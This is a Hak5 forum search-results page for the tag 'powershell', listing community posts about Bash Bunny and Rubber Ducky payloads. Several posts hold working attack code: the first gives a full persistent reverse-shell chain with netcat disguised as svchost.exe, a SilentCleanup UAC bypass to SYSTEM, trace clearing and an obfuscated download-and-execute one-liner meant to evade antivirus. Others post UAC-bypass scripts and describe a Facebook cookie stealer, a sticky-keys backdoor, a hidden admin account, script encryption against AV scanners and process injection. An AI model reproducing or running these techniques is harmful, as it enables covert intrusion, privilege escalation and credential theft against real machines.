Jump to content

Search the Community

Showing results for tags 'powershell'.



More search options

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Talk
    • Everything Else
    • Gaming
    • Questions
    • Business and Enterprise IT
    • Security
    • Hacks & Mods
    • Applications & Coding
    • Trading Post
  • WiFi Pineapple
    • WiFi Pineapple TETRA
    • WiFi Pineapple NANO
    • WiFi Pineapple Mark V
    • WiFi Pineapple Mark IV
    • Pineapple Modules
    • WiFi Pineapple University
    • WiFi Pineapples Mark I, II, III
  • Hak5 Gear
    • Hak5 Cloud C²
    • Bash Bunny
    • Packet Squirrel
    • LAN Turtle
    • USB Rubber Ducky
    • Plunder Bug
  • Hak5 Shows
    • Hak5
    • HakTip
    • Metasploit Minute
    • Threatwire
  • Community
    • Forums and Wiki
    • #Hak5
  • Projects
    • SDR - Software Defined Radio
    • Community Projects
    • Interceptor
    • USB Hacks
    • USB Multipass
    • Pandora Timeshifting

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


AIM


MSN


Website URL


ICQ


Yahoo


Jabber


Skype


Location


Interests


Enter a five letter word.

Found 32 results

  1. Link to my original reddit post So how do we create such reverse shell? Well, first of all you need to download netcat 1.12 and extract the nc64.exe. Once you got it extracted upload it to some file-hosting service of your choice, which provides DIRECT LINK (very important!!). I used Discord, works like charm and link doesn't expire. Second, you need to make yourself an .XML file which you're gonna need later for Task Scheduler. I believe scheduled tasks are rly good way to set up persistence, as well as escelating the file that it executes to NT Authority\SYSTEM privileges, while remaining stealthy. I already did the work for you. This is what it should look like. Just modify the arguments in the bottom to your IP/PORT. Once you got that done, save it and upload it for DIRECT LINK, just like you uploaded your previous file. Now, that the boring setup part is over, we get to the actual code that's being executed to achieve this type of shell: cd $env:public $url1="YOUR_NC64_LINK" $url2="YOUR_XML_LINK" $path1="$env:public\svchost.exe" $path2="$env:public\x.xml" (new-object net.webclient).downloadfile($url1,$path1) (new-object net.webclient).downloadfile($url2,$path2) cmd /r 'reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU" /va /f&reg add "HKCU\Environment" /v "windir" /d "%comspec% /r mode 18,1&cd %public%&schtasks /create /tn \"Windows Update Assistant\" /f /xml x.xml >nul&schtasks /run /tn \"Windows Update Assistant\" /i >nul&REM "&timeout /t 1&schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I >nul&timeout /t 1&reg delete "HKCU\Environment" /v "windir" /F&attrib +s +h svchost.exe&del /q x.xml' So first, it downloads both of your files via powershell, then it clears our Windows + R history to clear any traces of itself (if you're using USB RubberDucky). Then it uses this UAC bypass technique to create scheduled task called Windows Update Assistant, which is set to be executed to run with NT Authority\SYSTEM privileges in our .XML file. Then it marks our nc64.exe file as hidden system file, which is also now called svchost.exe and then it deletes our .XML file, since system doesn't need it anymore after task is created. Now you're probably thinking, this is all nice, but how the fk do I run this in one-line of code? Very simple, by invoking expression called DownloadString in powershell like this: powershell -nop -w 1 -c "iex (new-object net.webclient).downloadstring('YOUR_PASTEBIN')" But problem with this one-liner is, that it gets picked up by most AVs as "malicious activity". Therefore, we need to obfuscate it a bit: cmd.exe /c powershell -nop -w 1 -c "iex (.('ne'+'w-ob'+'ject') ('ne'+'t.webc'+'lient')).('do'+'wnloadstr'+'ing').invoke(('Y'+'OUR_'+'PASTEBIN'))" And there it is, this one liner will get you persistent reverse shell which will check for itself every minute if it's running and if it's not, then it executes itself silently in the background.
  2. In theory, this bash bunny script should make a directory in C:\Windows called uac-bypassed I have no way to test this specific script because I don't have a bash bunny or a rubber ducky, so I had to make do with a P4wnP1 A.L.O.A. any help making this payload smaller would be greatly appreciated. (The command at the bottom is for the P4wnP1 A.L.O.A) Q GUI R Q powershell Q ENTER Q DELAY 500 Q "echo \"if((([System.Security.Principal.WindowsIdentity]::GetCurrent()).groups -match `\"S-1-5-32-544`\")) { mkdir c:\\windows\\uac-bypassed } else { `$registryPath = `\"HKCU:\\Environment`\"; `$Name = `\"windir`\"; `$Value = `\"powershell -ep bypass -w h `$PSCommandPath;#`\"; Set-ItemProperty -Path `$registryPath -Name `$name -Value `$Value; schtasks /run /tn \\Microsoft\\Windows\\DiskCleanup\\SilentCleanup /I | Out-Null; Remove-ItemProperty -Path `$registryPath -Name `$name; }\" > uac.ps1" Q ENTER Q Set-ExecutionPolicy RemoteSigned -Scope CurrentUser Q ENTER Q DELAY 500 Q a Q .\\uac.ps1 Q ENTER Q rmdir uac.ps1 Q ENTER Q Set-ExecutionPolicy Undefined -Scope CurrentUser Q ENTER Q DELAY 500 Q a Q ENTER Q exit Q ENTER P4wnP1_cli hid run -c 'layout("us"); typingSpeed(15,0); press("GUI R"); type("powershell"); press("ENTER"); delay(500); type(" echo \"if((([System.Security.Principal.WindowsIdentity]::GetCurrent()).groups -match `\"S-1-5-32-544`\")) { mkdir c:\\windows\\uac-bypassed } else { `$registryPath = `\"HKCU:\\Environment`\"; `$Name = `\"windir`\"; `$Value = `\"powershell -ep bypass -w h `$PSCommandPath;#`\"; Set-ItemProperty -Path `$registryPath -Name `$name -Value `$Value; schtasks /run /tn \\Microsoft\\Windows\\DiskCleanup\\SilentCleanup /I | Out-Null; Remove-ItemProperty -Path `$registryPath -Name `$name; }\" > uac.ps1"); press("ENTER"); type("Set-ExecutionPolicy RemoteSigned -Scope CurrentUser"); press("ENTER"); delay(500); type("a"); press("ENTER"); type(".\\uac.ps1"); press("ENTER"); type("rmdir uac.ps1"); press("ENTER"); type("Set-ExecutionPolicy Undefined -Scope CurrentUser"); press("ENTER"); delay(500); type("a"); press("ENTER"); type("exit"); press("ENTER");'
  3. Hi everyone! First of all, sorry if my English is not that good, It's not my main language. I just signed up to the forum to post this, after watching the video Darren made about a payload that changes the Desktop background. I had this idea after he mentioned that the Lockscreen background could not be changed due to the fact that there isn't a "stable" method and it needed admin privileges. So I made a script which, when opened as standard user, respawns itself in a hidden window with full admin privileges and executes whatever payload you put in it. Here it is: if((([System.Security.Principal.WindowsIdentity]::GetCurrent()).groups -match "S-1-5-32-544")) { #Payload goes here #It'll run as Administrator } else { $registryPath = "HKCU:\Environment" $Name = "windir" $Value = "powershell -ep bypass -w h $PSCommandPath;#" Set-ItemProperty -Path $registryPath -Name $name -Value $Value #Depending on the performance of the machine, some sleep time may be required before or after schtasks schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I | Out-Null Remove-ItemProperty -Path $registryPath -Name $name } Explanation: There's a task in Task Scheduler called "SilentCleanup" which, while it's executed as Users, automatically runs with elevated privileges. When it runs, it executes the file %windir%\system32\cleanmgr.exe Since it runs as Users, and we can control user's environment variables, we can change %windir% (normally pointing to C:\Windows) to point to whatever we want, and it'll run as admin. The first line if((([System.Security.Principal.WindowsIdentity]::GetCurrent()).groups -match "S-1-5-32-544")) basically checks if we are admin, so that the script can detect whether it has been called by the user or by the task, and do stuff accordingly. Everything that need admin privs goes in this block of the if statement, while in the "else" block goes what can be run as standard user, including the bypass itself. The "Set-ItemProperty" line creates a new Registry Key "HKCU:\Environment\windir" in order to change the %windir% variable value to the command we want to be run as admin, in this case powershell -ep bypass -w h $PSCommandPath;# "$PSCommandPath" evaluates to our script path, "-ep bypass" is equal to "-ExecutionPolicy bypass" and "-w h" to "-WindowStyle hidden". The ";#" part is needed to comment out the rest of the path of the task from the command. So, in the end, the task's execution path evaluates to: powershell -ExecutionPolicy bypass -WindowStyle hidden <path of the script> ;#\System32\cleanmgr.exe The "schtasks" command will simply ask Windows to run the task with the now modified %windir% and "Remove-ItemProperty" will just delete the reg key after the task has been executed in order to not break other things and/or leave traces of the "attack". When the task runs, it will call the script with full fledged admin privs, so now the first block of the if statement is executed and our payload can do whatever we want. Note: In order to work, the code must be saved in a script file somewhere, it cannot be run directly from powershell or from the run dialog. However, if our payload is small enough to fit entirely in the %windir% variable, we can reduce the whole script to just the three fundamental lines, i.e. "Set-ItemProperty", "schtasks" and "Remove-ItemProperty". (Idk if it can fit in the run dialog though) Note2: I think it could break if the the script is in a path that contains spaces, but I think it's easily fixable by escaping the $PSCommandPath in the $Value variable
  4. Slydoor Passing Powershell scripts to victim PCs via USB storage. Hey guys, here comes my second payload! This payload passes scripts to a user PC via USB storage (possibly more options coming in future) and HID injection. Target: Windows 7, 8, 8.1, 10 Dependencies: File 'a.ps1' - This is the script that is initiated to run other scripts (requires Admin privileges) Features: Modes: - Payload 'modes' are .ps1 files in the payload directory, allowing you to create your own 'modes' and configure the payload to run them - Slydoor, by default, comes with 2 modes - recon and adder [Mode] Recon: - Gathers WLAN data via 'netsh' module - Gathers process data via 'Get-Process' module - Gathers computer hardware data [Mode] Adder: - Creates a local Administrator account - Username: Slydoor - Password: slydoor Known bugs: None found as of yet In saying that, the Bunny automatically goes dark (ATTACKMODE OFF, LED OFF) after 3 seconds once the UAC has been bypassed (7 seconds after starting the first script). Github: Link to Github page I will be updating this quite a bit in the background, so stay tuned if you are interested in keeping this up-to-date. I will only upload versions that are working properly. Usage: When you create a .ps1 script, you can drag it into the payload folder and open the 'payload.txt' file. Once you've opened the file, you can edit the MODE option near the top ([OPTION] Mode). Here you can specify the name of the script (mode). E.g. If I wanted to run the 'recon.ps1' script I would set MODE to "recon" (make sure it is a string!). It's as easy as that. Okay, that's cool, but how is it different to other Powershell 'agents'? It's not really, it's just an easy solution for those who want to get some Powershell scripts going as soon as they have their Bunny (many people having issues getting their own to work). Update log: - Updated to 1.2 at 11:50AM on 19/05/17 Feel free to give me lots of constructive feedback! If you find any bugs, comment below - I'll check this post most days. This payload is open-source and editable as you like, but please do not post a copy of this as your own work, as it isn't nice and it isn't your own work!
  5. Hello! I have a question. How to download shell from powershell (from win+r). Can someone write me a command to bunny?
  6. Hi, Based on the powershell script written to extract creds from Google Chrome, I made a script to read the SQLite database where the cookies are stored and extract Facebook session cookies. It uses no library, like in the ChromeCreds payload, I use regex to search for the cookies. I haven't written any payload, and I also want to do the same with Firefox. http://pastebin.com/25Z8peMb Enjoy
  7. Hello all! I would your help to solve an issue , nothing in loot folder. i already see mentioned into many posts but really got no a solution from here. Hands on a a Fresh NEW Bash Bunny with an outdated firmware ,windows 7 Ultimate x64 Pc. Keyboard settings are US for win7, and from factory in BB. If i open config.txt i read just: #!/bin/bash #This configuration file is used to set default variables DUCKY_LANG us Go ahead Updated the firmware, downloading the updater here https://bashbunny.com/setup , the payloads library and all will be updated too Fixed the device driver for the Gadget serial > opening the device manager on win7,found the alert near device, update driver >select the Bash Bunny path. The driver will be searched into the subfolders and installed. So rerun BB. i tried and i got connection with a shell on port COM4 with Putty . I have to run a script. Open library folder and copy content of H:\payloads\library\credentials\PasswordGrabber into H:\payloads\switch2 Download to Tool folder the laZagneX64.exe file , *also tried to rename it in laZAgne.exe That"s all. Switched to 2 and run BB. Result> only an EMPTY PasswordGrabber folder in Loot folder. ON SCREEN> I seen 2 popup windows, Run command from Win7 and a Terminal window black clean for just a second. Have Somebody solved this, and HOW ???? Thanks alot Quixx
  8. So, it has been a bit since I did any work on the BBTPS so posting some work I began doing on it. First, I have gotten some messages about the BBTPS needing to use npm to get Express before adding to Bunny. If you pull the No_Express branch, you will only need to copy it to the Bunny. No Node dependencies needed. That one had the web server rewritten to use core modules instead of addons. First, current bug: If your script is huge and you specify it to be a process, it may not run. This is due to the cmdline 8191 character limit. The process launcher in the BBTPS launches a new powershell process with your script as a compress/encoded command. If it is too big, it gets truncated. I am working on a different method so any size script could be fired as a process. Running it in a thread works fine since it runs as a job script within the agent. Work around would be to store the script in the /loot/bbtps folder and have a script in your joblist as a process that pulls the main script through SMB server that is running and execute it. What led to this discovery was another user pointing out issues with Powercat I included, which is a huge script and broke because of the limit. Stuff I am working on: Welp, for one I am refactoring the node server. This is to make it easier to future changes that require changes to the server which leads into the next change. The quack scripts control are being moved over to the node server. The launcher for the agent will not launch directly from the payload.txt but by the node server when it comes online. This will reduce the stager size since I will not need the looping wait counter to wait for the server to come up anymore. A new field is being added to the joblist.json schema called admin that will be boolean. This field specifies if the script requires admin rights. This leads to the new feature I am working on Autoadmin. No need to guess if the user is admin or not. The BBTPS will fire off a non-privilege command prompt. It will then fire a non-hidden stager that will pull down stage1 which will check for certain requirements. After checking, a signal is sent back the the node server running on the Bashbunny. The signal depends on if the user is a local admin or not. If they are then the signal will cause the Bashbunny node server to quack out the commands in the still open cmd prompt to launch a hidden stager elevated and even quack out the keystrokes to select yes. If the user is not admin then a normal hidden stager is launched with no extra keystrokes needed. On the server the joblist it has will filter out admin jobs if the user is not admin or keep them and run them with the non-admin jobs if user is admin. Non-admin jobs always run. Reduction of config files...well by 1. I am removing the payselect.txt file for config selection. It can be done from within the payload.txt file. The joblist.json file that lists the scripts is still there (how else are you going to be able to have different lists of scripts to run ready to go?) and the config file for the joblist is still needed to be configured (this is how you select the folder that has your scripts and the joblist file to use along with the quack delays and other fine tunings or do all your joblists work the same way?). The other files are still needed to preconfigure all your different job packs so if you want to switch, you just need to change the config file name in the payload.txt. HoppEye8x by H8.to. This will come in a later version as I am still working out a good way to implement this though would extend the possibility of being able to on the fly select out of 8 preloaded jobpacks you preconfigure to launch. This would extend the number of scripts you can run by 8x the number of scripts you have configured in each jobpack per. More work on instructions. I figured out I had issues with my instructions because I was trying to instruct on proper powershell module writing at the same time (which is not required for the BBTPS to work with but makes them way more easier to be ported around in into different jobpacks). New instructions will only include how to install, where all the configuration is done and their mean and use the current sample I have as an example of how it works so the samples will include the new methods. Just to reiterate, the BBTPS is a tool, not a payload. Payloads included with the BBTPS and jobpacks created from them in the repo are from other projects and there as example of usage not as included functions of the tool.
  9. Hi there, I was wondering how the powershell based bunny payloads that load powershell-script-files from either the smb or the webservice of the bunny could circumvent the system wide proxy. The problem is that the proxy - obviously - is unable to connect to the bunny-IP and the payload fails. The current versions of the payloads does not seem to take this into account. The expected behaviour should be to ignore the system proxy during the initial request to the bunny and to use it in all other requests which is powershell default. I am currently unaware of a good solution to circumvent a system wide proxy in powershell, especially without local admin. Any ideas? Best regards! F
  10. I've updated my psh_DownloadExecSMB payload to allow for exfiltration. psh_DownloadExecSMB will take any powershell payload, execute it and alert via green LED when it's completed. All file transfers happens over SMB to the Bash Bunny. In order to exfil data, have your powershell payload upload to \\172.16.64.1\s\l\ -- this will be copied to the BB as loot. Bonus: Because this payload uses SMB, any captured SMB credentials will be stored as loot. My Repo: https://github.com/hink/bashbunny-payloads/tree/payload/pshExecFixes/payloads/library/execution/psh_DownloadExecSMB Pull Request: https://github.com/hak5/bashbunny-payloads/pull/268
  11. Discussion thread for the RevShellBack payload. I've seen quite a few Rubber Ducky projects to do with getting a reverse shell running on a PC so that the shell can be accessed remotely on a different computer. But what got me thinking is this: the Bash Bunny is a full-on Linux ARM computer, right? It has netcat and it can do HID and ethernet simultaneously. So.. why not use that instead? At first, this payload will use a bit of HID trickery to hide itself from an observer as best as it can. As soon as it has done executing the final PowerShell command, HID is no longer used. User-defined commands will be sent to the computer in the background. By default, 4 commands are executed as a demo: Write file (with content) to the desktop Eject CD/DVD tray (if it exists) -- thank PowerShell for making that possible Open calculator application Message box -- powered by PowerShell For information about the payload, the payload script itself and how to configure it, it can be found at this GitHub repository: https://github.com/NodePoint/RevShellBack
  12. Has anyone addressed or had problems with running scripts on PowerShell. As the default on my windows 10 64bit all the lastest updates disables running of scripts, this can be changed with the Set-ExecutionPolicy but this needs Administrator access to change. Am I missing something really simple!?
  13. Okay all, I finally finished this thing well enough for me to release but more work yet to be done. It works. Try it out and let me know what you think. I got tired of fiddling with it and just decided to get something out there. https://github.com/PoSHMagiC0de/BBTPS Oh, my first time actually using github too. I usually have friends in town who does pushed on my behalf..cause I am lazy. I decided to learn git and do it myself.
  14. Hello all, I have 4 headless PCs here at my house and I was wondering in the event the internet goes down and I need to do a file transfer or something. Could I just plug the bash bunny in and have it execute a powershell script so I don't have to find a spare monitor and keyboard? Thanks, new to the bashbunny.
  15. Violation of CoC
  16. Hey I am super new to this, so forgive me if there is another payload like this, I looked around but could not find anything like it just yet. The payload copies CMD.exe to sethc.exe allowing you to press the shift key 5 times to open up a cmd line. Though the attack must be carried out when the user is logged in, you can still open the cmd line the same way even on the login screen. Let me know what you guys think, It's my first payload so I would appreciate any constructive criticism and any idea on how to make it better. https://github.com/InvaderSquibs/BashBunny/tree/master/payloads/library/StickyBunny
  17. Violation of CoC
  18. https://github.com/hak5/bashbunny-payloads/tree/master/payloads/library/recon/InfoGrabber It has been a while since my script was updated so if anyone want to want to help make it more effective or make it faster it would be much appreciated :D
  19. Hopefully I get the voting thing right as I wanted to add content, we will see. If you see 2 separate posts, it is because I am ignant. (spelled wrong on purpose). So, in my travels on this board, I have come across people building agents to run their Powershell scripts. Most make out fine. What has prompted this is I have been asked a few times about how I build an agent or even help in building one. The BBTPS is awesome, it just is advanced and scary to some. Plus if you are running only 1 payload and need no dynamic payload delivery then BBTPS is too much. Welp, I like helping, some of the time. In this case I am a helper. Who here would like a general purpose Powershell agent? All of its control can be done from the parameters for the function. Plan: It will be a single run only agent meaning once script is ran, it will exit unless the script doesn't end. Delivery of contents and results back to the server is not controlled by the agent like in its original version but controlled by the script ran. This means your script is responsible for talking back to the BB in whatever way you choose to deliver its contents. Instead of the version 1.0 version of bbAgent.ps1 that assumes all scripts are compressed, this will be the pre 1.0 which can take a script as text, compressed or plain utf8 base64 encoded. This means whatever format you choose, the script has to be formatted as such with launcher command if it is a function that requires calling. All configuration is done from parameters used when the function for the agent is launched. Protocol (SMB, HTTP, USB) Location: Dynamic param and depends on Protocol if this will be full url, network path or drive path for the script to be ran. Encoding: Is it text, compressed or base64. I have more but first want to know the interest before I leave the BBTPS for a minute to do this. For it to work it will be a 2 stage launch like in a chain. Your Quack command will be calling the agent with parameters. It will download the agent and run it with parameters which should be pointing to your script you want to run. It will download, decode if it has to and run our script. It will check on the job every two seconds. if it ends, it removes the job and exits cleanly. If the script keeps running, the agent keeps doing this cycle forever. Yeah, I type a lot.
  20. Hmm, So, who is interested in injecting their powershell process into another process to hide it? Only advantage to this is if you are not going to be there. Makes no sense to do it with the BB connected since you are going to be there but if you ever wanted to leave something behind (like the keylogger payload) but want it to be hidden well I can create a solution for you. I planned on doing it eventually when I was done optimizing the BBTPS but I can take a break from it to think of and create a template for ya'll. It will be borrowing from the PowershellEmpire teams PSInject module which uses the reflectivedllinject module from Powersploit to inject a dll that is 32bit or 64bit (dll holders and code to inject base64 unicode powershell into it before injection is all done by the Powershell Empire team' work, no need to reinvent the wheel. You can see I am a fanboy of theirs. :-P). The ideal way to use this is your launcher will be what is injected that will download the rest of the script. Reason for this is the placeholder in the dlls for the powershell code is only 3000 bytes big. That means your script after being encoded (and it has to be encoded) can only be 3000 characters long. No compression supported. Encode it and then do a length on it to see. But....your launcher will most likely be tiny and it will download and load the rest of the script which will have no limitation. The limitation is only with the initial injected powershell code into the dll. It will have to be a 2 stage process. First stage is quacked and pulls the injector script. The injector script will be psinject and command to invoke it along with all parameters and your base64 script are appended to the end so it all gets downloaded and ran with no additional stuff....or you can add an extra function to the injector to download your base64 script to add to the command and run. The script you use with the injector will be similar to the one first launched to get things started meaning it is injected into the premade dlls and then into the process of your choice and it then becomes the download cradle for your actual payload. So. Phase 1, get admin, or not if you are not aiming at a system process. Phase 2. Run first download cradle (same commands everyone is running to get their scripts started with QUACK) to get injector that will inject and launch second download cradle that will pull your actual script (like keylogger). After it is running, you will not be able to see it unless you use a tool like Sysinternals process explorer and inspect the threads of that process. Warning, no output to the console is shown with injected process unless you write it somewhere like to a file or send it back to the server but consider the injected process to have no console access. Of course you could still launch programs and do messageboxes to interact with the local terminal. if you inject a neverending process, it will never end and will not be able to be killed unless you use process explorer to kill its thread or you kill the process it hides in. Reboot would work too. Once again, for quick smash and grab runs this is highly useless but for deposits it is worthwhile. Let me know. No sense doing all the work with no interest hehe. "Just because you have a hammer, doesn't make everything a nail." :-P
  21. EncDecFiles.ps1 Author: (c) 2017 by QDBA Version 1.0 Description EncDecFiles.ps1 is a powershell script to Encrypt / Decrypt a powershell (or any other) file with AES. You can use it to obfuscate your powershell script, so AV Scanner doesn't detect it. Usage: EncDecFiles.ps1 < -Encrypt | -Decrypt > # encrypt or decrypt a file < -In Filename > # Input File [ -Out Filename ] # Output File [ -Pass Password ] # Password Example 1 - encdecfiles.ps1 -In c:\test.ps1 -encrypt Encrypts File c:\test.ps1 with password "hak5bunny" encrypted file is c:\test.enc Example 2 - encdecfiles.ps1 -In c:\test.ps1 -encrypt -pass secret Encrypts File c:\test.ps1 with password "secret" encrypted file is c:\test.enc Example 3 - encdecfiles.ps1 -In c:\test.ps1 -encrypt -Out c:\encrypted-file.aes -pass Secret Encrypt a File c:\Test.ps1 with password "Secret" encrypted file is c:\encrypted-file.aes Example 4 - encdecfiles.ps1 -In c:\Test.enc -decrypt Decrypt a encrypted file c:\test1.enc to c:\test1.ps1 with default password "hak5bunny" How to run the encrypted powershell script In the Script "Run_Script_Example.ps1" you see an example how to load and execute the encrypted Script. Load the encrypted script to a variable. Than execute the function Run with the variable and a password Download https://github.com/qdba/MyBashBunny/tree/master/Other/EncDecFiles
  22. Discussion Thread for Root CA installer. (No Local Admin Rights necessary) current development via: https://github.com/jrsmile/bashbunny-payloads/tree/master/payloads/library/rooter (TESTED and Working) pull request waiting. small Howto create self-signed-root-ca: Create the Root Certificate (Done Once) Creating the root certificate is easy and can be done quickly. Once you do these steps, you’ll end up with a root SSL certificate that you’ll install on all of your desktops, and a private key you’ll use to sign the certificates that get installed on your various devices. Create the Root Key The first step is to create the private root key which only takes one step. In the example below, I’m creating a 2048 bit key: openssl genrsa -out rootCA.key 2048 The standard key sizes today are 1024, 2048, and to a much lesser extent, 4096. I go with 2048, which is what most people use now. 4096 is usually overkill (and 4096 key length is 5 times more computationally intensive than 2048), and people are transitioning away from 1024. Important note: Keep this private key very private. This is the basis of all trust for your certificates, and if someone gets a hold of it, they can generate certificates that your browser will accept. You can also create a key that is password protected by adding -des3: openssl genrsa -des3 -out rootCA.key 2048 You’ll be prompted to give a password, and from then on you’ll be challenged password every time you use the key. Of course, if you forget the password, you’ll have to do all of this all over again. The next step is to self-sign this certificate. openssl req -x509 -new -nodes -key rootCA.key -sha256 -days 1024 -out rootCA.pem This will start an interactive script which will ask you for various bits of information. Fill it out as you see fit. You are about to be asked to enter information that will be incorporated into your certificate request. What you are about to enter is what is called a Distinguished Name or a DN. There are quite a few fields but you can leave some blank For some fields there will be a default value, If you enter '.', the field will be left blank. ----- Country Name (2 letter code) [AU]:US State or Province Name (full name) [Some-State]:Oregon Locality Name (eg, city) []:Portland Organization Name (eg, company) [Internet Widgits Pty Ltd]:Overlords Organizational Unit Name (eg, section) []:IT Common Name (eg, YOUR name) []:Data Center Overlords Email Address []:none@none.com Once done, this will create an SSL certificate called rootCA.pem, signed by itself, valid for 1024 days, and it will act as our root certificate. The interesting thing about traditional certificate authorities is that root certificate is also self-signed. But before you can start your own certificate authority, remember the trick is getting those certs in every browser in the entire world.
  23. Hello all, I have been trying to figure out a good payload to make for the BashBunny. Seems like most of you thought of the simple ones. The ones I was going to improve it seems the authors are on it so just dropping help here and there is really all that is needed. So, what could I write. Welp, after contributing to Powershell Empire and using other frameworks and having a partial framework I stopped working on myself in Powershell I decided to re-purpose parts of it and put it toward the BB. I been hearing people asking about dynamic switching and stuff like that. Welp, I decided work on a Bash Bunny Total Pwn System. I am terrible at names. It comprises of a nodejs server on the bash bunny serving payloads to Powershell agent that is launched on the machine. The whole process will be triggered by a stager that is quacked off onto the victim's machine. The stager will wait for the nodejs server to come up and pull the agent which it will execute. The agent will check in and check for jobs. It pulls a job from the server every 2 seconds. Each job is in json that includes a name for what the job to be called, and filename to be called for the return info on the BB. Jobs are defined on the server in a json file. After all jobs are deployed and none are left, the agent will continue to check the server for jobs while there are still jobs running on the agent. Job results can be delivered as text back to the nodejs server or files can be delivered back to the BB via SMB. SMB delivery has to be included with the script job being ran as the agent does not do this. When each job finishes on the agent, either its results will be returned or the job stats will be. When all jobs are done and none are left to retrieve, the agent will send the quit command back to the server so it can die and continue on in the payload script. The nodejs server will control the leds to let you know its status between each stage. The reason for the continuing to search for jobs after none are left is if you have a script that will check or do something before it can do something else, you can pull that as a job and call back to the server to push a job to be deployed. It will be picked up on the next cycle making this dynamic. So far I am 90% done with the server and about 30-40% done with the Powershell agent. I hope to have a rough working version of it on github in about a week or two depending on how busy I am with work. If you are wondering about it working on Mac and Linux. The server will fully neutral. That means if you have the skills, you can create an agent for those two Oses. I will be busy with the server and powershell agent mostly. A good example on building a python agent can be seen by looking at the Empire 2.0 python agent code on Github. That could give you some ideas minus all the roll your own crypto it does. Payloads will have the ability for you to format them before loading them on the BB as regular text, base64 encoded (utf8, not unicode so you can use python to encode it even without have to add 0x00 after each byte) or compressed. I will be putting some Powershell tools to help with creating these payloads on github as well. I modified Powersploit's Out-encodedcommand to only the compressed encoded script without the command to decompress it and the powershell part. The agent has a function to handle decompressing it back to full form. This is useful for large scripts. I said a lot about it so far. I will probably have the code up before I can build detailed docs for it so first iteration will be instructions on what is necessary to get started. Future additions after first release will include an extras url for pulling down extra files like dlls or what not in base64 encoding that you can use in your script like reflectiveinjection or like one of mine I built to Empire and have it all modularize and everything and have yet to submit a push to Empire repo. It is a proxy hijacker. If you are admin, have a burp session running and the public cert, this script can point a victims machine at your burp computer to be proxied via http and https and install the burp cert to the machines local machine trusted root auth's. I like to call it "Perfect Man in the Proxy" or "ProxyHijack". The cert can be pulled by the script later to be used from the extras url. No more typing, more coding. Stay tuned. Yeah, kinda big for my first BB project.
×
×
  • Create New...